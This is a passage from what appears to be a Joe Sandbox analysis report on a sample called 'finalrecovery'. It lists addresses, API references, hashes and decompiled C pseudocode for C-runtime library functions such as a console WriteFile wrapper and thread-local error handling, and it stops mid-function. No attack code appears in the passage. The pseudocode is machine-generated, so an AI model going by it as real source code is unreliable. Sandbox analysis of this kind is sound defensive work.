0x0042095b
0x00420a92
0x00420a95
0x00420a98
0x00420aa2
0x00420aad
0x00420ab2
0x00000000
0x00420961
0x00420968
0x0042096d
0x00420970
0x00420973
0x00000000
0x00420979
0x00420979
0x00000000
0x00420979
0x00420973
0x0042095b
0x00420920
0x00420924
0x00420927
0x0042092c
0x00420932
0x00420934
0x0042093b
0x00420981
0x00420984
0x00420985
0x0042098a
0x0042098d
0x00420990
0x00000000
0x00000000
0x00000000
0x00000000
0x00420990
0x00000000
0x0042091e
0x004207b9
0x00420ac1
0x00420ac1
0x00420ac3
0x00420ac6
0x00420ac6
0x00420ac6
0x00420ac6
0x00420ad8
0x00420ada
0x00420adb
0x00420adc
0x00420ae6

APIs

GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 00420783
__fassign.LIBCMT ref: 00420968
__fassign.LIBCMT ref: 00420985
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004209CD
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00420A0D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00420AB5

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 940b28119660a7e3c72b1a5bbb7280aebab35340e439732437ad35288d88db0d
Instruction ID: c6c7b871c7584928cda21ba0d9f8b4669952e113de818099f04fa4a4be9e3cd2
Opcode Fuzzy Hash: 940b28119660a7e3c72b1a5bbb7280aebab35340e439732437ad35288d88db0d
Instruction Fuzzy Hash: 9DC19E75E002689FCB10CFA9D9809EDFBF5AF18304F68416AE855F7342D6359A42CF68

Uniqueness

Uniqueness Score: -1.00%

Function 1000B668 Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E1000B668(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0x10017004; // 0xb1cc4d85
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x10018128 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E10006961( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x10018128 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0x10017750; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x10018128 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E1000C296( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x10017750)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0x10018128 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E10005070( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0x10018128 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E1000C296( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E10008D54(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E10009EF0(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t100 =  &(_t269[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0x10018128 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0x10018128 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x10018128 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E10009DB5( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E10009DB5();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E100026A5(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x1000b673
0x1000b67a
0x1000b67d
0x1000b685
0x1000b688
0x1000b695
0x1000b698
0x1000b69b
0x1000b6a2
0x1000b6aa
0x1000b6ad
0x1000b6b0
0x1000b6b6
0x1000b6b8
0x1000b6bf
0x1000b6c9
0x1000b6cb
0x1000b6ce
0x1000b6d1
0x1000b6d4
0x1000b6d7
0x1000b6da
0x1000b6e0
0x1000b9eb
0x1000b9eb
0x00000000
0x1000b6e6
0x1000b6ee
0x1000b6f1
0x1000b6f7
0x1000b6fa
0x1000b701
0x1000b708
0x1000b70b
0x00000000
0x00000000
0x1000b714
0x1000b719
0x1000b71b
0x1000b71e
0x1000b723
0x1000b727
0x00000000
0x00000000
0x00000000
0x1000b727
0x1000b72c
0x1000b72e
0x1000b733
0x1000b7ed
0x1000b7f4
0x1000b7f5
0x1000b7f8
0x1000b7fa
0x1000b99e
0x1000b9a0
0x00000000
0x1000b9a2
0x1000b9a2
0x1000b9a5
0x1000b9b4
0x1000b9b8
0x1000b9b9
0x1000b9b9
0x00000000
0x1000b9bd
0x1000b800
0x1000b802
0x1000b808
0x1000b80b
0x1000b817
0x1000b820
0x1000b82b
0x1000b830
0x1000b833
0x1000b836
0x00000000
0x1000b83c
0x1000b83c
0x00000000
0x1000b83c
0x1000b836
0x1000b739
0x1000b748
0x1000b749
0x1000b74c
0x1000b74f
0x1000b754
0x1000b96a
0x1000b96c
0x1000b96e
0x1000b970
0x1000b97a
0x1000b982
0x1000b984
0x1000b985
0x1000b989
0x1000b98c
0x1000b98c
0x1000b990
0x1000b990
0x1000b990
0x1000b993
0x1000b993
0x1000b993
0x1000b995
0x1000b995
0x1000b999
0x1000b75a
0x1000b75a
0x1000b75d
0x1000b75f
0x1000b762
0x1000b765
0x1000b769
0x1000b76a
0x1000b76e
0x1000b771
0x1000b776
0x1000b780
0x1000b785
0x1000b788
0x1000b78b
0x1000b78b
0x1000b78e
0x1000b791
0x1000b793
0x1000b79c
0x1000b7a0
0x1000b7a1
0x1000b7a5
0x1000b7ab
0x1000b7b4
0x1000b7c1
0x1000b7c8
0x1000b7cc
0x1000b7d7
0x1000b7dc
0x1000b7e2
0x00000000
0x1000b7e8
0x1000b83f
0x1000b840
0x1000b8c3
0x1000b8ca
0x1000b8d2
0x1000b8da
0x1000b8df
0x1000b8e2
0x1000b8e7
0x00000000
0x1000b8ed
0x1000b902
0x1000b9e2
0x1000b9e8
0x00000000
0x1000b908
0x1000b911
0x1000b913
0x1000b919
0x00000000
0x1000b91f
0x1000b923
0x1000b959
0x1000b95c
0x00000000
0x1000b962
0x1000b962
0x00000000
0x1000b962
0x1000b925
0x1000b927
0x1000b929
0x1000b942
0x00000000
0x1000b948
0x1000b94c
0x00000000
0x1000b952
0x1000b952
0x1000b955
0x1000b956
0x00000000
0x1000b956
0x1000b94c
0x1000b942
0x1000b923
0x1000b919
0x1000b902
0x1000b8e7
0x1000b7e2
0x1000b754
0x00000000
0x1000b844
0x1000b844
0x1000b848
0x1000b84b
0x1000b86d
0x1000b870
0x1000b875
0x1000b879
0x1000b87d
0x1000b8ab
0x1000b8ad
0x00000000
0x1000b87f
0x1000b87f
0x1000b87f
0x1000b882
0x1000b885
0x1000b888
0x1000b9bf
0x1000b9c2
0x1000b9c5
0x1000b9cf
0x1000b9da
0x1000b9df
0x00000000
0x1000b88e
0x1000b895
0x1000b89a
0x1000b89d
0x1000b8a0
0x00000000
0x1000b8a6
0x1000b8a6
0x00000000
0x1000b8a6
0x1000b8a0
0x1000b888
0x1000b84d
0x1000b851
0x1000b854
0x1000b859
0x1000b85f
0x1000b861
0x1000b868
0x1000b8ae
0x1000b8b1
0x1000b8b2
0x1000b8b7
0x1000b8ba
0x1000b8bd
0x00000000
0x00000000
0x00000000
0x00000000
0x1000b8bd
0x00000000
0x1000b84b
0x1000b6e6
0x1000b9ee
0x1000b9ee
0x1000b9f0
0x1000b9f3
0x1000b9f3
0x1000b9f3
0x1000b9f3
0x1000ba05
0x1000ba07
0x1000ba08
0x1000ba09
0x1000ba13

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B6B0
__fassign.LIBCMT ref: 1000B895
__fassign.LIBCMT ref: 1000B8B2
WriteFile.KERNEL32(?,100099AA,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B8FA
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B93A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B9E2

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 097549b3cd2c9408e50889de6714abab221e55fe4ef52fe460242119fed2154a
Instruction ID: 804339c2ab9ca531080afddb9689496ae25b9d637466f115f449b3e6ccf07116
Opcode Fuzzy Hash: 097549b3cd2c9408e50889de6714abab221e55fe4ef52fe460242119fed2154a
Instruction Fuzzy Hash: A5C1AF75D046589FEB11CFE8C8809EDBBB9FF08354F28816AE955B7245D631AE02CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00411D24 Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00411D24(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x43d080 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00413050(_t13, __eflags,  *0x43d080);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E0041308B(_t14, __eflags,  *0x43d080, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E0041941E();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E0041308B(_t18, __eflags,  *0x43d080, 0);
								} else {
									_t8 = E0041308B(_t18, __eflags,  *0x43d080, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00415EF8(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x00411d24
0x00411d2b
0x00411d3e
0x00411d45
0x00411d47
0x00411d48
0x00411d4b
0x00411d64
0x00411d64
0x00411d4d
0x00411d4d
0x00411d4f
0x00411d59
0x00411d60
0x00411d62
0x00411d69
0x00411d72
0x00411d75
0x00411d76
0x00411d78
0x00411d8c
0x00411d8c
0x00411d95
0x00411d7a
0x00411d81
0x00411d87
0x00411d88
0x00411d8a
0x00411d9e
0x00411da0
0x00411da0
0x00000000
0x00000000
0x00000000
0x00411d8a
0x00411da3
0x00000000
0x00000000
0x00000000
0x00411d62
0x00411d4f
0x00411dab
0x00411db5
0x00411d2d
0x00411d2f
0x00411d2f

APIs

GetLastError.KERNEL32(?,?,00411D1B,00410121,0040F759), ref: 00411D32
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00411D40
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00411D59
SetLastError.KERNEL32(00000000,00411D1B,00410121,0040F759), ref: 00411DAB

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 45bd82ce1dbd3c8e72b1b680d8146cb8cc17257a2e8ce5ccc350ce85e15801c5
Instruction ID: 71ba8d15746a3766ab297c8b2ffbe03a6e88efaf6a5283193a4727f9c150b75d
Opcode Fuzzy Hash: 45bd82ce1dbd3c8e72b1b680d8146cb8cc17257a2e8ce5ccc350ce85e15801c5
Instruction Fuzzy Hash: 0501F732A1D7215EA7382B76BD856EB2A94EB41B7A720033FF610811F1EF596C93914C

Uniqueness

Uniqueness Score: -1.00%

Function 10003D9A Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E10003D9A(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x10017020 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E10004F5B(_t13, __eflags,  *0x10017020);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E10004F96(_t14, __eflags,  *0x10017020, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E10006956();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E10004F96(_t18, __eflags,  *0x10017020, 0);
								} else {
									_t8 = E10004F96(_t18, __eflags,  *0x10017020, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E10005B84(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x10003d9a
0x10003da1
0x10003db4
0x10003dbb
0x10003dbd
0x10003dbe
0x10003dc1
0x10003dda
0x10003dda
0x10003dc3
0x10003dc3
0x10003dc5
0x10003dcf
0x10003dd6
0x10003dd8
0x10003ddf
0x10003de8
0x10003deb
0x10003dec
0x10003dee
0x10003e02
0x10003e02
0x10003e0b
0x10003df0
0x10003df7
0x10003dfd
0x10003dfe
0x10003e00
0x10003e14
0x10003e16
0x10003e16
0x00000000
0x00000000
0x00000000
0x10003e00
0x10003e19
0x00000000
0x00000000
0x00000000
0x10003dd8
0x10003dc5
0x10003e21
0x10003e2b
0x10003da3
0x10003da5
0x10003da5

APIs

GetLastError.KERNEL32(00000001,?,10003BA1,10002D56,1000274D,?,10002985,?,00000001,?,?,00000001,?,10015758,0000000C,10002A7E), ref: 10003DA8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003DB6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003DCF
SetLastError.KERNEL32(00000000,10002985,?,00000001,?,?,00000001,?,10015758,0000000C,10002A7E,?,00000001,?), ref: 10003E21

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 771aeb49660016f9d5647455081cf89269a185284411c32b0fd4ff88b1ef2e2d
Instruction ID: b990e60918235e4ac70af63d19640b18bd6850258aa6d70c0182e592d86f0761
Opcode Fuzzy Hash: 771aeb49660016f9d5647455081cf89269a185284411c32b0fd4ff88b1ef2e2d
Instruction Fuzzy Hash: 2901B1376087229EF217C6B4ACC9A1B37EDEB092F5721832AF518851E9EE619C019244

Uniqueness

Uniqueness Score: -1.00%

Function 00423BBE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00423BBE(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E0041A517(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E00427E4C(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E004134C4();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E0041E1DB(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E00427E4C(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E004240F1(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E0041E238(_t300);
														_t302 = _v12;
													}
